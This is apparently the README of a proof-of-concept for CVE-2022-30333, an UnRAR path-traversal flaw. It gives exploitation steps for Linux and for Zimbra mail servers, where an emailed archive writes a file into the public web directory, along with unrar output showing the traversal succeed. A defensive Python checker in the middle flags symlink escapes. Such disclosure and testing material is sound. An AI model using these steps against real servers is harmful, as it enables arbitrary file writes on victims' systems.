CVE-2022-30333-POC
Sample file to test CVE-2022-30333
- Sample.rar: for testing on Linux. When extracted, it creates trav in ../../tmp/traversed. Make sure the directory ../../tmp/traversed exists before extracting Sample.rar.
- exp.rar: for testing on a Zimbra mail server. When extracted, it creates moo.txt in /opt/zimbra/jetty_base/webapps/zimbra/public/. You can access this file at https://zimbra_mail_domain/public/moo.txt
EXPLOITATION STEPS
Testing on Linux
mkdir ../../tmp/traversed (the destination folder must exist before unrar)
ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul 4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul 4 02:40 ..
unrar x exp.rar
UNRAR 6.10 beta 1 freeware Copyright (c) 1993-2021 Alexander Roshal
Corrupt header is found
sym - the file header is corrupt
Extracting from exp.rar
Corrupt header is found
sym - the file header is corrupt
Extracting sym OK
Extracting sym/trav OK
Total errors: 4
ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul 4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul 4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu 14 Jul 4 02:34 trav
cat ../../tmp/traversed/trav
"traversed"
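A defender-side check, added here as an example and not part of this PoC repository: given an archive's entry list (names plus symlink targets), it simulates extraction in archive order, resolves every entry through symlinks the archive itself created earlier, and reports anything that would be written or pointed outside the extraction directory. The entry list and the extraction directory /home/ubuntu/work are constructed to mirror the sym and sym/trav sequence in the unrar output above; the Entry type, resolve() and find_escapes() are hypothetical helpers, not UnRAR or Zimbra code. The check treats backslashes as path separators because UnRAR on Unix rewrites Windows-style separators to slashes, which is the conversion CVE-2022-30333 abuses. It only models links created by the archive, not links already present on disk.

```python
import posixpath
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class Entry:
    """One archive entry (hypothetical model of a RAR file header)."""
    name: str                             # path stored in the archive
    symlink_target: Optional[str] = None  # set when the entry is a symlink


def split_parts(path: str) -> List[str]:
    """Split an archive path into components, treating '\\' like '/'.
    UnRAR on Unix converts backslashes to slashes, so a target written as
    ..\\..\\tmp must be judged exactly like ../../tmp."""
    return [p for p in path.replace("\\", "/").split("/") if p not in ("", ".")]


def resolve(base: str, path: str, links: Dict[str, str], depth: int = 0) -> str:
    """Resolve `path` relative to the absolute directory `base`, following
    symlinks recorded in `links` (resolved link path -> raw target)."""
    if depth > 32:
        raise ValueError("symlink loop while resolving %r" % path)
    cur = posixpath.normpath(base)
    for part in split_parts(path):
        if part == "..":
            cur = posixpath.dirname(cur)  # dirname("/") == "/", so it cannot go above root
            continue
        candidate = posixpath.join(cur, part)
        if candidate in links:
            target = links[candidate]
            start = "/" if target.startswith(("/", "\\")) else cur
            cur = resolve(start, target, links, depth + 1)
        else:
            cur = candidate
    return cur


def is_inside(root: str, path: str) -> bool:
    """True if `path` equals `root` or lies below it (both already resolved)."""
    root = posixpath.normpath(root)
    return path == root or path.startswith(root.rstrip("/") + "/")


def find_escapes(root: str, entries: List[Entry]) -> List[Tuple[str, str]]:
    """Simulate extracting `entries` in order into `root`; return
    (entry description, resolved absolute path) for every file write or
    link target that would end up outside `root`."""
    root = posixpath.normpath(root)
    links: Dict[str, str] = {}
    escapes: List[Tuple[str, str]] = []
    for e in entries:
        dest = resolve(root, e.name, links)
        if not is_inside(root, dest):
            escapes.append((e.name, dest))
        if e.symlink_target is not None:
            # Where the link points, resolved relative to the link's own directory.
            tgt = e.symlink_target
            start = "/" if tgt.startswith(("/", "\\")) else posixpath.dirname(dest)
            pointed = resolve(start, tgt, links)
            if not is_inside(root, pointed):
                escapes.append((e.name + " -> " + tgt, pointed))
            links[dest] = tgt  # later entries may be written through this link
    return escapes


# Constructed listing mirroring the unrar session above: a link two levels
# up, a file written through it, the same trick with Windows separators,
# and one benign entry.
SAMPLE_ENTRIES = [
    Entry("sym", symlink_target="../../tmp/traversed"),
    Entry("sym/trav"),
    Entry("win", symlink_target="..\\..\\tmp\\win"),
    Entry("docs/readme.txt"),
]

if __name__ == "__main__":
    for what, where in find_escapes("/home/ubuntu/work", SAMPLE_ENTRIES):
        print("ESCAPE: %-32s -> %s" % (what, where))
```

Running it reports the sym link target, the sym/trav write and the backslash variant, and stays silent on docs/readme.txt. Real extractors should apply the same containment test after resolving paths on the actual filesystem (for example with os.path.realpath) rather than trusting the archive listing alone.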
Testing on Zimbra
- Create an email, attach the malicious rar file and send it to a Zimbra email address. The rar file is extracted when Amavisd analyzes it.
- moo.txt should then be at /opt/zimbra/jetty_base/webapps/zimbra/public/moo.txt, reachable at https://zimbra_mail_domain/public/moo.txt
REFERENCES
- Vietnamese blog from DEV2SEC
- English blog from Sonarsource
- Special thanks to mrlihd for helping me rebuild the attack chain in Zimbra